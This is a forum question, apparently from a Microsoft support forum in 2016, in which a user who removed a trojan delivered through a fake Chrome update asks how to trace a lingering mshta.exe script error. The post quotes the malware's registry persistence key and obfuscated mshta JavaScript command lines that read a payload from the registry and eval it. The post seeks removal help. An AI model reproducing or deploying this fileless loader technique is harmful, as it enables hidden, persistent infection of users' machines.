none
Source of script error Error: invalid root in registry key "HKCU\software\ydwarldiy\zujmvfhc".

    Question

  • Trojan infection was mitigated through the employment of sysinternals.  Source of trojan infection was a CHROME emergency update fake post.  Use of Sysinternals and W7 bootstick allowed for the removal of most of the infection.

    Original infection keys and file removed

    [HKEY_USERS\S-1-5-21-1232934697-1086943095-315576832-55753\Software\Classes\c31796]

    [HKEY_USERS\S-1-5-21-1232934697-1086943095-315576832-55753\Software\Classes\c31796\shell]

    [HKEY_USERS\S-1-5-21-1232934697-1086943095-315576832-55753\Software\Classes\c31796\shell\open]

    [HKEY_USERS\S-1-5-21-1232934697-1086943095-315576832-55753\Software\Classes\c31796\shell\open\command]
    @="\"C:\\Windows\\system32\\mshta.exe\" \"javascript:i9KIFxNK=\"S\";u5W9=new ActiveXObject(\"WScript.Shell\");xxFwDLW1=\"83lvZdZJ\";HdP0t=u5W9.RegRead(\"HKCU\\\\software\\\\ydwarldiy\\\\zujmvfhc\");wu5Uwrzh=\"Qd07LlR\";eval(HdP0t);gY6bZRg=\"aB8l\";\""

    -----------------------------------------------------------------------

    Persistent script error still occurs.  Have sourced it to the mshta.exe.  Image file is verified as microsoft Version 11.0.9600.16428.  Command line seems to be the culprit.  C:\Windows\System32\mshta.exe" javascript:DPHB4C0="98sQmHed";v22t=new%20ActiveXObject("WScript.Shell");Dr1JH6E="zlYd";f58vmO=v22t.RegRead("HKCU\\software\\ydwarldiy\\zujmvfhc");PpoQ6="ISftyd";eval(f58vmO);biRVr0uH="Az";

    Autostart location

    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\(Default)

    comes up empty.

    Ran a procmon bootlog but did not find anything more in it that would produce the command line call out.  How can this be efficiently and correctly found?

    Friday, July 22, 2016 11:52 PM

Answers

All replies